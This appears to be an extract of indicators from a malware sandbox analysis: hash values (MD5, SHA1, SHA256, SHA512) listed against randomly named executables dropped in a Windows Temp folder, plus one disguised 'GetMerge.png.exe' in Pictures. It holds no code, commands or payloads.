MD5 4c40bf6ccaf76b63a305acf739e5032e
SHA1 7c21266d77cee31172d30b2a4629df17897623cc
SHA256 51ed3444eb96f575777b869ec0a7efb0fe640a40411af99d47988fb3bd191429
SHA512 93243fcaee712e1d67fc0b7a5af787b0708ad8555c10fd315c7d48e88bf70df82ba26e47ce967bb6406dccfc47af960aed29ceb5341b3be8663901a5112092a3

C:\Users\Admin\AppData\Local\Temp\oMwA.exe

MD5 37d2a1c7fadd03ff7ce0f238edafed5a
SHA1 7ada7d77fe5b60822ecfce1395b3e71af0fab9a4
SHA256 9312baf98942e9c0b043c63aeae3d82db7eb80008793ee99d70b3d13bb883df2
SHA512 7c50a2472e7ee75d22bc095b258a80894cb8b909e922ec8af9dac155712a7eca025d8996be3b28b9654cdd770387091ca71ba5ae79260e80345e0d2c8de56087

C:\Users\Admin\AppData\Local\Temp\gMIE.exe

MD5 2035afc9a13d0e23a4e80ef7ad96ca35
SHA1 b5d49a6e11f7e225672de921642260cb3eeaab49
SHA256 5815d329ef9c08e1c544d3bc420d4530575d7f749c0c477134cc246603ddafce
SHA512 ab1f0c1ac51e15ca7e3d9b3e2aca5e76f59a5f18d8f28f3cb81b1e75f905f0e014b1e5574028797707dc18333508ae1e8c06e8ea61802cb880839f48890a536d

C:\Users\Admin\AppData\Local\Temp\cQwI.exe

MD5 9891965029c7110c50dd8d852c1d680e
SHA1 371936e10bbaeb607b012343e31194127fe73d7e
SHA256 96f21bf8db08b69c8cd0ae9ed4591c487e85b8685f0ecb266977f73aaae2b5bf
SHA512 5cbad6cce63924ed374efb3809110c40c9c2ccd665c2f126c88e4c43fca66dbc1b2d2d700aeeb3c1f4619388e84d1f1faa23c1597765b1259cc6593fcb17eed4

C:\Users\Admin\Pictures\GetMerge.png.exe

MD5 de19cd5aa40ab8f4ded20cc8a73b9ae9
SHA1 bc24023c002e5714670534dfa63d4826cd503c85
SHA256 2e588dd198f0f0f9d2df6e43bc39304d11e02222f5175dfbe78e82016ed22e27
SHA512 e6c856cdfcd0426c56707ae047ebabe150c6b60f6de489b70c7415efa0d9e50821c8bb3fbf767191b542510b8f9883e51427df8312163f6f685c9122ca0e7052

C:\Users\Admin\AppData\Local\Temp\KoEY.exe

MD5 a896f2f91c7e460fdacfb7886259141e
SHA1 32943754f9f07c5ce26a1fa0a4c4470152eb77a2
SHA256 2b5db0272100963b3c952fe3d3c1acad667ad41c05dc7a1d7908178f5c287a19
SHA512 d38dd315d490059fc8807e267095f3b8053889a4674673f8378c5e7b3523652cc8429a7bbd45fc27c1039d9e320b744d48d42288339d4ede5e6b5f809025de61

C:\Users\Admin\AppData\Local\Temp\qQkM.exe

MD5 cdba5d419c29f680524b7179b25c7ddf
SHA1 b31a25ac797a330a6b3588e28af8305e09132805
SHA256 e6e7de664e0ef62149c7d415abd949fbbeea0c5de8c266551799bf861feaa462
SHA512 71d231f69c7db0c9cdc9725affe978300cd451fbf1f36e358cdd4657abd4ea143a59dd9f405e3190f502b9e4398e5e1a5cdc218437f40f1c8af41c80932f160f

C:\Users\Admin\AppData\Local\Temp\mMIU.ico

MD5 7ebb1c3b3f5ee39434e36aeb4c07ee8b
SHA1 7b4e7562e3a12b37862e0d5ecf94581ec130658f
SHA256 be3e79875f3e84bab8ed51f6028b198f5e8472c60dcedf757af2e1bdf2aa5742
SHA512 2f69ae3d746a4ae770c5dd1722fba7c3f88a799cc005dd86990fd1b2238896ac2f5c06e02bd23304c31e54309183c2a7cb5cbab4b51890ab1cefee5d13556af6

C:\Users\Admin\AppData\Local\Temp\UYMi.ico

MD5 ace522945d3d0ff3b6d96abef56e1427
SHA1 d71140c9657fd1b0d6e4ab8484b6cfe544616201
SHA256 daa05353be57bb7c4de23a63af8aac3f0c45fba8c1b40acac53e33240fbc25cd
SHA512 8e9c55fa909ff0222024218ff334fd6f3115eccc05c7224f8c63aa9e6f765ff4e90c43f26a7d8855a8a3c9b4183bd9919cb854b448c4055e9b98acef1186d83e

C:\Users\Admin\AppData\Local\Temp\ccYu.exe

MD5 2df12e6ab3a452c970699b1e1d16bd90
SHA1 b9cf207fc3806709e93161cc7f13cc3ac6315bc0
SHA256 80b7bc6f3e54226a4816e6443c8cce7db7ef2bfba4163f5d4e5edb23f61a6645
SHA512 4af2fa40f5bea580b7a9b6c0cdc8ee0d63dd3bf985de6316cd68c582c8d8fb2e1808f4b2b98ee6241d94110100eea057f54d3364423a9ad9d1b018e9a8a9c715

C:\Users\Admin\AppData\Local\Temp\SQUA.exe

MD5 270a6a092f7c440524bc3e4747abb67b
SHA1 4eb58629afdb885875358176bb87bb0af6d25a94
SHA256 d3119d5cd111659ba3149b82d3b6bd621404aa603c98a369a6ddfc7569790ca0
SHA512 96de3ea02d376f7424a8b353463aa147747f9adc5914b85900ee89cf4afc14c72b21b31d6493b59468e47c074ad0dafb6a46b66ec0e1b0e7f5bf002d2891f8c8

C:\Users\Admin\AppData\Local\Temp\cUEm.exe

MD5 fb048f97b622a7e45de4055fe1e11cdb
SHA1 8feb1cfe837457c342ceebf9f4e2379624cd2b98
SHA256 7b1ab6eb340621bc87456f36b8f3a2149f717ab2a7e31c727b512f2fc5fc7f5b
SHA512 c62620f657ec192ae00770be5754eb08f279bf98f24b6261e47f91177226d5c349ed0697114f469fcf9eac27bdcca59e35f48326747f2b9dd1db3be8c06dfe0f

C:\Users\Admin\AppData\Local\Temp\GsEm.exe

MD5 90ad1ac7b84809c8c18a6f32807059cf
SHA1 58930728121d9c314da2d9b76347bfa049091c48
SHA256 9406c0d3ef057bfed3117d1a87dae808caf0071837516d4a9ac703c1c8eb197a
SHA512 a453451b752ff965e1ea3f49977694d70be11ea6c77670246f64649c94011133b254eeeed821e5daf15754dada222e047e19f01612f3e76f80985fa66ea5b7dd

C:\Users\Admin\AppData\Local\Temp\ocEc.exe

MD5 626f6d1148490c6b53686a0b7c075a01
SHA1 af0fdd634db2607cb5568ef7d7d377b569d5498a
SHA256 0b3aae0f39a37acc32542b9a1f730ac463c1930bb015b41bf3fb45a0a11e6eef
SHA512 81063daf6c12740cdb7066f4021b1af0ab5690f1fd2ad4062535e9beadbf36ee00eeb13df06c197f9658c5919def8d035d12e64a9dc237121d55f1fe3efc7b3c

C:\Users\Admin\AppData\Local\Temp\gwEo.exe

MD5 c6bdcf51bbf9c78e043d7d37abab87ae
SHA1 5e4c385dbdbb254753d68555d174809374997754
SHA256 110c2fff46d6d5dbdfb170883122c172cebf03bba9fc21afdde1e28ba7903d68
SHA512 15d2336062a45bae353f953c0fc4c9cbe1725cc5a60a67dafdfa259a44432241b870179f8ec0370e52184dec2c458afb18df2b8b3107cf379c1b0c7dd88d5d16

C:\Users\Admin\AppData\Local\Temp\OsoW.exe

MD5 5b02f65ea024809db50be1ab4c05041a
SHA1 395debe9c181606015b35c8b7dc21df98a4b1504
SHA256 d77e8682320dc332032c10689e44c7d2a339821e40892b1cb44be0a23358426d
SHA512 c0f424b3f1ce9491456a2e8ee08b12a4c1933e0d7c30f052c2ad3645defb54cc92d040169d04ea211696c8e9b7fd27faac9399f8e4cdbb8f70bbf6915cd56e2a

C:\Users\Admin\AppData\Local\Temp\IsoW.exe

MD5 af8bfa7aa0b4a318d1e82c209a9ce15a
SHA1 f12c9d08b6717f27be66a940dca65b461f31359c
SHA256 7ba04a203e15ca9212d00e6aa892fbdec102e2c840572b336cce9d9dd6038e6d
SHA512 dbed2f072cd4ea0c09b2b35fe4af854c68f6dff5cca38fa3e19121ea5e29662039e75919ab0c78a7a629892d5f99ac14c602fe5f44324703634d892c8ef87564

C:\Users\Admin\AppData\Local\Temp\iUMg.exe

MD5 6d6e168360ff7a5e595959c16939f8a0
SHA1 76e3df46d672fdfd171368b918919a891bccc6cc
SHA256 ee3e34ce6284c487be332ddfff7d7df21546a99345510f25319b811ba387eed1
SHA512 7088e0c48c546f7b0dac1170b8e5f5328aea55f8d5ab5c73f961d0cd5065f7db0a1c9939460b25fbb02486e0945e760dc2f1d2b9673dec51b565f31758a5fb80

C:\Users\Admin\AppData\Local\Temp\YIUQ.exe

MD5 1b3359363ae023cb27a1561a8bf239d2
SHA1 b44b157cb24a656190e51ca45356823a60b99ceb
SHA256 23e62995947d2597901eeaf677d7ef3f0778fa9e7c82b0c8b049ef7059302ae8
SHA512 4c31d47badf3191d94aac30af9f16a901e326d48334936c1b46d63c8c76661841a392979b3e900cbcf8b567a98041e73ee50e96c5c8c00c1a97af80c12f3e27a

C:\Users\Admin\AppData\Local\Temp\UgUW.exe

MD5 03c3b364e78cc11045feb117cbf2a789
SHA1 a20d52584334ec5afab077e822bbd7ab1cc6a4c7
SHA256 14c57d7def61d192280141c1c88be3e95a04403ea74e91742dd8dea5d8685f08
SHA512 0c1bc6a4dddb94127b7d9f06b9ac81e4f5831052cff6fab083974495f7dc0303b48a4c97a558a7b55cb26c5d2f271e8d4bb44887b6ebc7ba4e4c787b525fb45f

C:\Users\Admin\AppData\Local\Temp\wEgE.exe

MD5 dabb53b3e9309d6273924237a19faa80
SHA1 bfaff60977c4cf237016d1fc61739703684d58db
SHA256 21f4cea29d5b8c52ab9a8c3c75afe1d148a76aabf85498200913434104f89ccc
SHA512 148ffab7e07822ce65e90e86687e0d402fef66f8811d08ed8b1a4a5be740a23d3db164eab78ff35de9a2019bc7d5c9ceaf07d3cdfdb64e5dd0447ce4a1cb04ce